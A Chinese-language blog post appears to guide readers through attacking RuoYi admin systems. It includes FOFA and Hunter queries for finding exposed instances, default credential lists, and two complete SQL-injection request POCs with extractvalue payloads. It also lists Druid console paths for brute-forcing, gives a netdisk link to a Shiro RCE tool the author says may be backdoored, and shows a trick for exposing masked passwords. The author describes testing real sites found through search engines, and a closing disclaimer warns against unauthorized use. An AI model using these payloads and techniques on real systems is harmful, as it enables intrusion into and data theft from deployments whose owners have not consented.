针对若依系统nday的常见各种姿势

0x1 前言

这篇文章也是在前几天跟着我几个厉害的师傅一起学习学的多种nday的打法,然后自己也是花了很多的时间在网上找相关若依系统的nday打法,然后自己利用FOFA和鹰图进行资产收集,然后进行渗透测试各个站点,然后把若依常见的姿势打出来给师傅们分享下!

0x2 若依系统简介

Ruoyi(若依)是一款基于Spring BootVue.js开发的快速开发平台。它提供了许多常见的后台管理系统所需的功能和组件,包括权限管理、定时任务、代码生成、日志管理等。Ruoyi的目标是帮助开发者快速搭建后台管理系统,提高开发效率。

若依有很多版本,其中使用最多的是Ruoyi单应用版本(RuoYi),Ruoyi前后端分离版本(RuoYi-Vue),Ruoyi微服务版本(RuoYi-Cloud),Ruoyi移动版本(RuoYi-App)。

配合ruoyi的服务

alibaba druid
alibaba nacos
spring
redis
mysql
minio
fastjson
shiro
swagger-ui.html
mybatis

0x3 信息收集/资产收集

浅谈

对于我们在渗透测试以及挖src的过程中,其实最先开始的信息收集以及对目标资产的资产收集是最重要的一个环节。这次带师傅们来对我们这次若依系统的一个资产收集,常见的资产收集的话就是直接使用一些安全空间引擎,比如常用的FOFA、鹰图等,还有就是一些企业查询的,比如爱企查、企查查等,然后使用里面的检索语法去做一个信息收集。

拓展

首先给师傅们看下若依系统最经典的加载界面,就是这样的一个加载页面,其实见多了的师傅会发现这个若依系统的加载界面其实和blade的加载界面很像的

blade登录后台网站特征

FOFA

下面这个绿色的小草就是若依的icon图标,然后就可以拿这个直接去FOFA检索了

FOFA检索语法如下:

(icon_hash="-1231872293" || icon_hash="706913071")

然后可以看到其实是有两种颜色的小草icon图标的,都是常见的若依系统

可以看到这里利用上面的语法可以检索出来差不多七万多条独立的IP数,其实不止这些,像很多网站都魔改,然后比如icon图标都会修改

鹰图

鹰图的检索语法如下:

web.body="若依后台管理系统"

0x4 若依系统打nday

漏洞一:弱口令漏洞

下面是常见的若依系统的弱口令,但是其中我碰到的若依弱口令都是admin:admin123、ry:admin123这两套账号密码,要是弱口令尝试不出来就撤吧了,因为若依的前端漏洞特别少

用户:admin ruoyi druid
密码:123456 admin druid admin123 admin888

这里直接就是弱口令登录进去了

漏洞二:SQL注入漏洞

都是POST请求方式

注入点一::在/system/role/list接口的params[dataScope]参数

POC如下:

POST /system/role/list HTTP/1.1
Host: 
Content-Length: 179
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: 
Cookie: 
Connection: close

pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e)

注入点二:/system/dept/edit ancestors参数存在SQL漏洞

RuoYi v4.6版本

POC 如下:

POST /system/dept/edit HTTP/1.1
Host: 
Content-Length: 179
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: 
Cookie: 
Connection: close

DeptName=1&deptid=100&ParentId=12&Status=0&ordernum=1&ancestors=0)or(extractvalue(1,concat((select user()))));#

其中最简单的测试方式就是直接把url以及cookie值拿到若依工具去检测

这里需要注意的是这个小饼干插件,新版本的若依系统的cookie值是Admin-Token值且是JWT编码的,右边的是老版本的,就是jsessionid值

漏洞三:druid页面渗透

可以看到bp数据包里面有很多的/prod-api接口,其实看若依系统多的师傅们都这到这个接口就是若依框架的常见的一个关键字接口

druid常见访问路径:

/druid/index.html
/druid/login.html
/prod-api/druid/login.html
/prod-api/druid/index.html
/dev-api/druid/login.html
/dev-api/druid/index.html
/api/druid/login.html
/api/druid/index.html
/admin/druid/login.html
/admin-api/druid/login.html

直接访问这个常用的路径,直接爆出来了druid的登录后台的页面,这样我们就是可以尝试使用弱口令登录,或者通过bp抓包然后进行账号密码爆破,账号一般是admin

下面就直接利用弱口令登录成功了,然后后面就可以尝试打下druid的nday漏洞了

可以看到在URL监控里面泄露了很多的敏感信息接口

然后还可以使用swagger插件进行信息泄露的利用

漏洞四:默认shiro key命令执行漏洞

直接使用Liqunkit工具梭哈,目前github上的Liqunkit工具都被下架了,下面是直接使用百度网盘分享下这个工具

链接:https://pan.baidu.com/s/1SzyVpnFvP0Qfp1Z1stpyug
提取码:1tyl
--是否有后门自行测试

漏洞五:弱口令+历史漏洞结合

下面这个网站我是直接访问,然后页面自动显示了账号密码的,账号是admin,但是密码加密了,但是懂点语言相关的师傅们都知道,这个直接在源代码里面,把password改成别的或者直接删掉就可以回显密码了

直接改下password参数,然后就可以看到密码了,然后直接登录后台

然后我再利用鹰图去测试下源代码里面的特殊关键字,看看跟这个站点一样的网站还有没有,
利用鹰图检索出来了蛮多的网站,但是独立的IP数量就只有两个

使用admin:admin123再拿别的网站测试,发现利用同样的手法也都是可以登录成的
这个主要是给师傅们分享下打站点的思路,这个站点的通杀手法没什么特别大价值,但是思路很重要。

漏洞六:Spring-Boot漏洞

师傅们可以看到下面这个站点哈,说是若依的系统,但是没有任何的若依的特征,像碰到这样的站点,师傅们该怎么去测试呢?

下面就给师傅们分享下思路,我们可以使用若依的常见的路径,然后进行一个路径的拼接

常见访问路径:

/druid/index.html
/druid/login.html
/prod-api/druid/login.html
/prod-api/druid/index.html
/dev-api/druid/login.html
/dev-api/druid/index.html
/api/druid/login.html
/api/druid/index.html
/admin/druid/login.html
/admin-api/druid/login.html

拼接路径成功后,可以看到下面的页面回显的不就是经典的spring-boot报错页面嘛

然后就可以使用曾哥的spring-boot 工具扫描下,然后看看泄露的信息有什么,
扫描结果显示确实存在spring-boot框架漏洞,后面的就是直接去访问泄露的接口url了,这个不是给师傅们分享的重点,后面的信息泄露就不给师傅们拿出来了。

0x5 总结

上面就是简单给师傅们介绍下若依系统的信息收集,包括主要使用FOFA和鹰图怎么去检索相关若依的漏洞。然后后面给师傅们演示了几个类型的nday的打法。主要是给师傅们分享下思路以及经验,对于若依系统的常见姿势的一个打法总结汇总。
希望对师傅们有帮助哈!!!

文章中涉及的敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

  • 14
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值